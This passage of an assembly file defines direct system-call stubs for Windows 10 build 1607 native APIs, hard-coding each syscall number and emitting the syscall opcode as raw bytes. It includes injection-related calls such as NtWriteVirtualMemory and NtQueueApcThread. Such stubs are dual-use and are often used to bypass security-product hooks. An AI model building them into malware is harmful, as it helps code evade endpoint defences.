_10_0_14393_sp0_windows_10_rs1_1607_NtDeviceIoControlFile ENDP
; ULONG64 __stdcall NtWriteFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteFile PROC STDCALL
mov r10 , rcx
mov eax , 8
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteFile ENDP
; ULONG64 __stdcall NtRemoveIoCompletion( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRemoveIoCompletion PROC STDCALL
mov r10 , rcx
mov eax , 9
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRemoveIoCompletion ENDP
; ULONG64 __stdcall NtReleaseSemaphore( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseSemaphore PROC STDCALL
mov r10 , rcx
mov eax , 10
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseSemaphore ENDP
; ULONG64 __stdcall NtReplyWaitReceivePort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyWaitReceivePort PROC STDCALL
mov r10 , rcx
mov eax , 11
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyWaitReceivePort ENDP
; ULONG64 __stdcall NtReplyPort( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyPort PROC STDCALL
mov r10 , rcx
mov eax , 12
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyPort ENDP
; ULONG64 __stdcall NtSetInformationThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationThread PROC STDCALL
mov r10 , rcx
mov eax , 13
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationThread ENDP
; ULONG64 __stdcall NtSetEvent( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetEvent PROC STDCALL
mov r10 , rcx
mov eax , 14
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetEvent ENDP
; ULONG64 __stdcall NtClose( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtClose PROC STDCALL
mov r10 , rcx
mov eax , 15
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtClose ENDP
; ULONG64 __stdcall NtQueryObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryObject PROC STDCALL
mov r10 , rcx
mov eax , 16
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryObject ENDP
; ULONG64 __stdcall NtQueryInformationFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationFile PROC STDCALL
mov r10 , rcx
mov eax , 17
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationFile ENDP
; ULONG64 __stdcall NtOpenKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKey PROC STDCALL
mov r10 , rcx
mov eax , 18
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKey ENDP
; ULONG64 __stdcall NtEnumerateValueKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateValueKey PROC STDCALL
mov r10 , rcx
mov eax , 19
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateValueKey ENDP
; ULONG64 __stdcall NtFindAtom( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFindAtom PROC STDCALL
mov r10 , rcx
mov eax , 20
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFindAtom ENDP
; ULONG64 __stdcall NtQueryDefaultLocale( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDefaultLocale PROC STDCALL
mov r10 , rcx
mov eax , 21
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDefaultLocale ENDP
; ULONG64 __stdcall NtQueryKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryKey PROC STDCALL
mov r10 , rcx
mov eax , 22
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryKey ENDP
; ULONG64 __stdcall NtQueryValueKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryValueKey PROC STDCALL
mov r10 , rcx
mov eax , 23
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryValueKey ENDP
; ULONG64 __stdcall NtAllocateVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 24
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateVirtualMemory ENDP
; ULONG64 __stdcall NtQueryInformationProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationProcess PROC STDCALL
mov r10 , rcx
mov eax , 25
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationProcess ENDP
; ULONG64 __stdcall NtWaitForMultipleObjects32( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForMultipleObjects32 PROC STDCALL
mov r10 , rcx
mov eax , 26
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForMultipleObjects32 ENDP
; ULONG64 __stdcall NtWriteFileGather( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteFileGather PROC STDCALL
mov r10 , rcx
mov eax , 27
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteFileGather ENDP
; ULONG64 __stdcall NtSetInformationProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationProcess PROC STDCALL
mov r10 , rcx
mov eax , 28
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationProcess ENDP
; ULONG64 __stdcall NtCreateKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateKey PROC STDCALL
mov r10 , rcx
mov eax , 29
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateKey ENDP
; ULONG64 __stdcall NtFreeVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFreeVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 30
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFreeVirtualMemory ENDP
; ULONG64 __stdcall NtImpersonateClientOfPort( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtImpersonateClientOfPort PROC STDCALL
mov r10 , rcx
mov eax , 31
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtImpersonateClientOfPort ENDP
; ULONG64 __stdcall NtReleaseMutant( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseMutant PROC STDCALL
mov r10 , rcx
mov eax , 32
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReleaseMutant ENDP
; ULONG64 __stdcall NtQueryInformationToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationToken PROC STDCALL
mov r10 , rcx
mov eax , 33
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationToken ENDP
; ULONG64 __stdcall NtRequestWaitReplyPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtRequestWaitReplyPort PROC STDCALL
mov r10 , rcx
mov eax , 34
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtRequestWaitReplyPort ENDP
; ULONG64 __stdcall NtQueryVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 35
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryVirtualMemory ENDP
; ULONG64 __stdcall NtOpenThreadToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenThreadToken PROC STDCALL
mov r10 , rcx
mov eax , 36
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenThreadToken ENDP
; ULONG64 __stdcall NtQueryInformationThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationThread PROC STDCALL
mov r10 , rcx
mov eax , 37
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryInformationThread ENDP
; ULONG64 __stdcall NtOpenProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenProcess PROC STDCALL
mov r10 , rcx
mov eax , 38
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenProcess ENDP
; ULONG64 __stdcall NtSetInformationFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationFile PROC STDCALL
mov r10 , rcx
mov eax , 39
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationFile ENDP
; ULONG64 __stdcall NtMapViewOfSection( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtMapViewOfSection PROC STDCALL
mov r10 , rcx
mov eax , 40
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtMapViewOfSection ENDP
; ULONG64 __stdcall NtAccessCheckAndAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckAndAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 41
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckAndAuditAlarm ENDP
; ULONG64 __stdcall NtUnmapViewOfSection( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnmapViewOfSection PROC STDCALL
mov r10 , rcx
mov eax , 42
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnmapViewOfSection ENDP
; ULONG64 __stdcall NtReplyWaitReceivePortEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyWaitReceivePortEx PROC STDCALL
mov r10 , rcx
mov eax , 43
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReplyWaitReceivePortEx ENDP
; ULONG64 __stdcall NtTerminateProcess( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtTerminateProcess PROC STDCALL
mov r10 , rcx
mov eax , 44
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTerminateProcess ENDP
; ULONG64 __stdcall NtSetEventBoostPriority( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetEventBoostPriority PROC STDCALL
mov r10 , rcx
mov eax , 45
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetEventBoostPriority ENDP
; ULONG64 __stdcall NtReadFileScatter( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReadFileScatter PROC STDCALL
mov r10 , rcx
mov eax , 46
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReadFileScatter ENDP
; ULONG64 __stdcall NtOpenThreadTokenEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenThreadTokenEx PROC STDCALL
mov r10 , rcx
mov eax , 47
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenThreadTokenEx ENDP
; ULONG64 __stdcall NtOpenProcessTokenEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenProcessTokenEx PROC STDCALL
mov r10 , rcx
mov eax , 48
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenProcessTokenEx ENDP
; ULONG64 __stdcall NtQueryPerformanceCounter( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryPerformanceCounter PROC STDCALL
mov r10 , rcx
mov eax , 49
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryPerformanceCounter ENDP
; ULONG64 __stdcall NtEnumerateKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateKey PROC STDCALL
mov r10 , rcx
mov eax , 50
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateKey ENDP
; ULONG64 __stdcall NtOpenFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenFile PROC STDCALL
mov r10 , rcx
mov eax , 51
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenFile ENDP
; ULONG64 __stdcall NtDelayExecution( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDelayExecution PROC STDCALL
mov r10 , rcx
mov eax , 52
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDelayExecution ENDP
; ULONG64 __stdcall NtQueryDirectoryFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDirectoryFile PROC STDCALL
mov r10 , rcx
mov eax , 53
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDirectoryFile ENDP
; ULONG64 __stdcall NtQuerySystemInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemInformation PROC STDCALL
mov r10 , rcx
mov eax , 54
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemInformation ENDP
; ULONG64 __stdcall NtOpenSection( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSection PROC STDCALL
mov r10 , rcx
mov eax , 55
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSection ENDP
; ULONG64 __stdcall NtQueryTimer( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryTimer PROC STDCALL
mov r10 , rcx
mov eax , 56
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryTimer ENDP
; ULONG64 __stdcall NtFsControlFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFsControlFile PROC STDCALL
mov r10 , rcx
mov eax , 57
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFsControlFile ENDP
; ULONG64 __stdcall NtWriteVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 58
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteVirtualMemory ENDP
; ULONG64 __stdcall NtCloseObjectAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCloseObjectAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 59
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCloseObjectAuditAlarm ENDP
; ULONG64 __stdcall NtDuplicateObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDuplicateObject PROC STDCALL
mov r10 , rcx
mov eax , 60
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDuplicateObject ENDP
; ULONG64 __stdcall NtQueryAttributesFile( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryAttributesFile PROC STDCALL
mov r10 , rcx
mov eax , 61
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryAttributesFile ENDP
; ULONG64 __stdcall NtClearEvent( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtClearEvent PROC STDCALL
mov r10 , rcx
mov eax , 62
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtClearEvent ENDP
; ULONG64 __stdcall NtReadVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReadVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 63
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReadVirtualMemory ENDP
; ULONG64 __stdcall NtOpenEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenEvent PROC STDCALL
mov r10 , rcx
mov eax , 64
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenEvent ENDP
; ULONG64 __stdcall NtAdjustPrivilegesToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAdjustPrivilegesToken PROC STDCALL
mov r10 , rcx
mov eax , 65
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAdjustPrivilegesToken ENDP
; ULONG64 __stdcall NtDuplicateToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDuplicateToken PROC STDCALL
mov r10 , rcx
mov eax , 66
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDuplicateToken ENDP
; ULONG64 __stdcall NtContinue( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtContinue PROC STDCALL
mov r10 , rcx
mov eax , 67
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtContinue ENDP
; ULONG64 __stdcall NtQueryDefaultUILanguage( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDefaultUILanguage PROC STDCALL
mov r10 , rcx
mov eax , 68
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDefaultUILanguage ENDP
; ULONG64 __stdcall NtQueueApcThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueueApcThread PROC STDCALL
mov r10 , rcx
mov eax , 69
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueueApcThread ENDP
; ULONG64 __stdcall NtYieldExecution( );
_10_0_14393_sp0_windows_10_rs1_1607_NtYieldExecution PROC STDCALL
mov r10 , rcx
mov eax , 70
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtYieldExecution ENDP
; ULONG64 __stdcall NtAddAtom( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAddAtom PROC STDCALL
mov r10 , rcx
mov eax , 71
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAddAtom ENDP
; ULONG64 __stdcall NtCreateEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEvent PROC STDCALL
mov r10 , rcx
mov eax , 72
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEvent ENDP
; ULONG64 __stdcall NtQueryVolumeInformationFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryVolumeInformationFile PROC STDCALL
mov r10 , rcx
mov eax , 73
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryVolumeInformationFile ENDP
; ULONG64 __stdcall NtCreateSection( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateSection PROC STDCALL
mov r10 , rcx
mov eax , 74
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateSection ENDP
; ULONG64 __stdcall NtFlushBuffersFile( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushBuffersFile PROC STDCALL
mov r10 , rcx
mov eax , 75
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushBuffersFile ENDP
; ULONG64 __stdcall NtApphelpCacheControl( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtApphelpCacheControl PROC STDCALL
mov r10 , rcx
mov eax , 76
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtApphelpCacheControl ENDP
; ULONG64 __stdcall NtCreateProcessEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProcessEx PROC STDCALL
mov r10 , rcx
mov eax , 77
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProcessEx ENDP
; ULONG64 __stdcall NtCreateThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateThread PROC STDCALL
mov r10 , rcx
mov eax , 78
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateThread ENDP
; ULONG64 __stdcall NtIsProcessInJob( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtIsProcessInJob PROC STDCALL
mov r10 , rcx
mov eax , 79
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtIsProcessInJob ENDP
; ULONG64 __stdcall NtProtectVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtProtectVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 80
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtProtectVirtualMemory ENDP
; ULONG64 __stdcall NtQuerySection( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySection PROC STDCALL
mov r10 , rcx
mov eax , 81
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySection ENDP
; ULONG64 __stdcall NtResumeThread( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtResumeThread PROC STDCALL
mov r10 , rcx
mov eax , 82
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtResumeThread ENDP
; ULONG64 __stdcall NtTerminateThread( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtTerminateThread PROC STDCALL
mov r10 , rcx
mov eax , 83
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTerminateThread ENDP
